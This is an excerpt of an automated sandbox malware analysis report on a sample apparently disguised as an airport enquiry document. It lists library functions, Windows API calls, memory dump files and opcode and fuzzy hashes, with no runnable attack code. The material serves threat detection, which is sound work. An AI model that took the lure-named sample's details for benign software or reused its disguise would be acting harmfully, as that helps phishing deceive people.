              • Part of subcall function 00CA594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,00CA1013,?), ref: 00CA598F
            • std::exception::exception.LIBCMT ref: 00CA102C
            • __CxxThrowException@8.LIBCMT ref: 00CA1041
              • Part of subcall function 00CA87DB: RaiseException.KERNEL32(?,?,?,00D3BAF8,00000000,?,?,?,?,00CA1046,?,00D3BAF8,?,00000001), ref: 00CA8830
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
            • String ID:
            • API String ID: 3902256705-0
            • Opcode ID: eced9a2b7bd787b72abf01f63608a3d235632c0ec799f0e56b16bae4d94f92d3
            • Instruction ID: ba96646be28531fecb0638e131bb1c9561284efde65b87f41d3a68e27d8b7bdf
            • Opcode Fuzzy Hash: eced9a2b7bd787b72abf01f63608a3d235632c0ec799f0e56b16bae4d94f92d3
            • Instruction Fuzzy Hash: 01F0A93550025BA7CB21AA58FC159EF77A89F02358F140415FC1495691DFB18BD496E0
            Function 00CA582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __lock_file_memset
            • String ID:
            • API String ID: 26237723-0
            • Opcode ID: cebfdcee8383c7f8159c376b2f0c79d6a1ca6276ce3b8a7188b64b8c15bed91c
            • Instruction ID: 933ca890c120e0ce646e5fd49286d3c7781e2505115028569ebd0fefbf8acd3f
            • Opcode Fuzzy Hash: cebfdcee8383c7f8159c376b2f0c79d6a1ca6276ce3b8a7188b64b8c15bed91c
            • Instruction Fuzzy Hash: C6018471C4060BEFCF22AF698C0559E7B61AF42768F148215F8245A1E1DB358A21EB91
            Function 00CA55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            • __lock_file.LIBCMT ref: 00CA561B
              • Part of subcall function 00CA6E4E: __lock.LIBCMT ref: 00CA6E71
            • __fclose_nolock.LIBCMT ref: 00CA5626
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
            • String ID:
            • API String ID: 2800547568-0
            • Opcode ID: 64df2a234d53bf2d37ff5be9585fdfeb185356b22b3476d50fbca0c21ec0b590
            • Instruction ID: 883022f6b3a51a448737eb66c5b482a402b52bacd808ee12260a7036439a46b4
            • Opcode Fuzzy Hash: 64df2a234d53bf2d37ff5be9585fdfeb185356b22b3476d50fbca0c21ec0b590
            • Instruction Fuzzy Hash: 51F09071800A079BD720AF759C0676E76A16F4333CF55C209F424AB2C1CF7C8A05AB55
            Function 00C92123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 35f629f0312496d1f5dfa7dee80978be214cb1063116b545b58616b2b5e9eb96
            • Instruction ID: 875596632ec756843be04280bcfa3ed502c0c864ad61c838bbfc229a7bd4b12b
            • Opcode Fuzzy Hash: 35f629f0312496d1f5dfa7dee80978be214cb1063116b545b58616b2b5e9eb96
            • Instruction Fuzzy Hash: F751A034600604AFCF14FB64C995FBE77A5AF45314F148068F956AB382DB30EE01EB55
            Function 00C85C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
            Download Yara Rule
            APIs
            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00C85CF6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: a029d4694a564c7375a5ac158865afa49e2976c3da61556375b66196af5c9ca6
            • Instruction ID: 3ffa2d19e72080797c24ea864033d478599884cf193fc8737de6e46cbe4816c5
            • Opcode Fuzzy Hash: a029d4694a564c7375a5ac158865afa49e2976c3da61556375b66196af5c9ca6
            • Instruction Fuzzy Hash: 58313C71A00B19AFCB18EF2DC48469DB7B5FF48314F24862AD81993710D7B1AD50DB94
            Function 00CC00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 2a3ea1a1a5bb883bd4bec2368364784ad9790cf0564a596b6488b603849f68b3
            • Instruction ID: 6bff8bfd93a4a97fdbcc1fef606ce2161b4018a0b194671d12f3ec66cb3e9495
            • Opcode Fuzzy Hash: 2a3ea1a1a5bb883bd4bec2368364784ad9790cf0564a596b6488b603849f68b3
            • Instruction Fuzzy Hash: FF411574508341CFDB24DF14C484B1ABBE0BF45318F1989ADE8AA8B762C372EC95CB56
            Function 00C85B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID:
            • API String ID: 4104443479-0
            • Opcode ID: 45d9751bc9b845b5560437cb370dc9aa8c6d3379ab14484764bb470731025edf
            • Instruction ID: 91f7a1fc5f3d7763da10cd8f356cd5e31e23918be61f1a73fc07b68cb32f5021
            • Opcode Fuzzy Hash: 45d9751bc9b845b5560437cb370dc9aa8c6d3379ab14484764bb470731025edf
            • Instruction Fuzzy Hash: 5921D270A00A09EBDB106F55E8856FE7FB8FF10790F21846AE485D2111EBB095E0E755
            Function 00C84F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00C84D4D
              • Part of subcall function 00CA548B: __wfsopen.LIBCMT ref: 00CA5496
            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84F6F
              • Part of subcall function 00C84CC8: FreeLibrary.KERNEL32(00000000), ref: 00C84D02
              • Part of subcall function 00C84DD0: _memmove.LIBCMT ref: 00C84E1A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Library$Free$Load__wfsopen_memmove
            • String ID:
            • API String ID: 1396898556-0
            • Opcode ID: 089316a574793cd5477790825f6eeec9b9921e260cf117ed5be3eeb1317ef9c3
            • Instruction ID: fb96d886279115f254ae3414fab37551276b6bb9f7dafb721dccec932bdf3437
            • Opcode Fuzzy Hash: 089316a574793cd5477790825f6eeec9b9921e260cf117ed5be3eeb1317ef9c3
            • Instruction Fuzzy Hash: 73110A31600306ABCB18FF75CC12FAE77A99F44709F20842DF542E61C1DB759A05AB64
            Function 00CC01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 0302715ac60442b929505c2c850763bc772ba153059041595cbffebca8bee6c2
            • Instruction ID: 5eeedba24650adda7d80b045483b6e84270b4f4a89d92e89a0b51857994eb467
            • Opcode Fuzzy Hash: 0302715ac60442b929505c2c850763bc772ba153059041595cbffebca8bee6c2
            • Instruction Fuzzy Hash: C52142B4508342CFDB24EF14C484B1BBBE0BF88308F09896DE8AA47721D731E855DB66
            Function 00C85D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
            Download Yara Rule
            APIs
            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00C85807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C85D76
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 5897caf9abc0aeb8ab58a79c013f7aa59ced2c35d5f349d6fd3d66b6296c90d6
            • Instruction ID: 003d21b3c0bd8f9860ba13ed4de4c039ebf9f6c3c7e647240d3c1f9388988fae
            • Opcode Fuzzy Hash: 5897caf9abc0aeb8ab58a79c013f7aa59ced2c35d5f349d6fd3d66b6296c90d6
            • Instruction Fuzzy Hash: B1113A31200B019FD3309F15C584B66B7E5EF45758F10C92EE8AA87A50D7B1F945CB64
            Function 00C85BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID:
            • API String ID: 4104443479-0
            • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
            • Instruction ID: 4b634a0ae7740083ce71d324d3c27dfb0cf2056aa917466a6417e8275bfc6ab1
            • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
            • Instruction Fuzzy Hash: 0001DFB8200542AFC305EB29C881D6AFBA9FF8A3047148119F819C7702DB70EC21CBE0
            Function 00CA4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
            Download Yara Rule
            APIs
            • __lock_file.LIBCMT ref: 00CA4AD6
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __getptd_noexit__lock_file
            • String ID:
            • API String ID: 2597487223-0
            • Opcode ID: 4ffd620b6406e107f8079bb6493993bdb5ae179970c5d1f495aa333619811e18
            • Instruction ID: a721884265547d2d68d0d40b67bc7fedbad49a761f7d9212456eb7e149873f3e
            • Opcode Fuzzy Hash: 4ffd620b6406e107f8079bb6493993bdb5ae179970c5d1f495aa333619811e18
            • Instruction Fuzzy Hash: 21F0A43194020B9BDF55AFB48C063DF7661AF4272DF084514F424AA1D1CBB88E64FF55
            Function 00CA097A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
            Download Yara Rule
            APIs
            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CA09F4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LongNamePath
            • String ID:
            • API String ID: 82841172-0
            • Opcode ID: f4d080f305362b169fa0d243051235ae4c2e60f4ed6739982650aff3713cf986
            • Instruction ID: 3fdf78fb51014c71db710cd81f3c07bba4534240de2eb61c3c3ad4be64b6e33a
            • Opcode Fuzzy Hash: f4d080f305362b169fa0d243051235ae4c2e60f4ed6739982650aff3713cf986
            • Instruction Fuzzy Hash: CCE026339841144BEF2093A59C06BFD73A9DF53320F3643AEAC05D3106D5655913A792
            Function 00C84FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
            Download Yara Rule
            APIs
            • FreeLibrary.KERNEL32(?,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84FDE
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID:
            • API String ID: 3664257935-0
            • Opcode ID: ce550fd06b81f6c716322bf13c9df7c9f78ea368550905d7a2c08a6404b500af
            • Instruction ID: 3e3234ef29cbcfc2ab49e71feef56aecb224be0691a63b079eceec3eb7111551
            • Opcode Fuzzy Hash: ce550fd06b81f6c716322bf13c9df7c9f78ea368550905d7a2c08a6404b500af
            • Instruction Fuzzy Hash: DBF03071505713CFCB38AFA5D494912BBE1BF1532D3218A3EE2D682610C7719940DF54
            Function 00CA09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
            Download Yara Rule
            APIs
            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CA09F4
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LongNamePath_memmove
            • String ID:
            • API String ID: 2514874351-0
            • Opcode ID: 284a7d1436cff40ce45781c874e8f1d0684f2027e4365f1e609f42506a2f8990
            • Instruction ID: aaf3d1a0c848ea435817818256f56630cab555deead93347eda5cdecd8f37f9c
            • Opcode Fuzzy Hash: 284a7d1436cff40ce45781c874e8f1d0684f2027e4365f1e609f42506a2f8990
            • Instruction Fuzzy Hash: 61E0CD7690422857C720E6689C05FFA77EDDF88790F0402B6FC0CD7305E960AC818694
            Function 00CE9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __fread_nolock
            • String ID:
            • API String ID: 2638373210-0
            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
            • Instruction ID: c73aa42afd4de480447b114fe294311fbf8fd082c5f05aedb0b42e26199b3c39
            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
            • Instruction Fuzzy Hash: 30E092B0104B405FD7348A24D8107E373E0FB06315F00081CF2AA83341EB6278418759
            Function 00C85DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
            Download Yara Rule
            APIs
            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00CBE16B,?,?,00000000), ref: 00C85DBF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: d568686fa7d3f7b168619a19ac8e80f5a72c1f42653fadc8b4182caed2a45c62
            • Instruction ID: 4ecbe4d73cb6c0c983c74b553925857593f5695a29c3e767c5616a01d53922f0
            • Opcode Fuzzy Hash: d568686fa7d3f7b168619a19ac8e80f5a72c1f42653fadc8b4182caed2a45c62
            • Instruction Fuzzy Hash: 34D0C774A4030CBFE710DB80DC46FA9777CD705710F200194FD0496790D6B27D508795
            Function 00CA548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wfsopen
            • String ID:
            • API String ID: 197181222-0
            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
            • Instruction ID: 5877ff0931631079478888dce54fbdb9c21ec80df5455d38a789c00fe1ab3792
            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
            • Instruction Fuzzy Hash: 2CB0927A84020C7BDE012E82EC02A593F199B45678F808020FB0C28162A673A6A0A689
            Function 00CED2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(00000002,00000000), ref: 00CED46A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLast
            • String ID:
            • API String ID: 1452528299-0
            • Opcode ID: 9aa71172edffd4255e2898e353237289c2cf24466a0589ffbde9bedbc7ed561d
            • Instruction ID: d9608739987aafe867c3a241155a9b1b0d3832d810fcbe3f65a923aaace91829
            • Opcode Fuzzy Hash: 9aa71172edffd4255e2898e353237289c2cf24466a0589ffbde9bedbc7ed561d
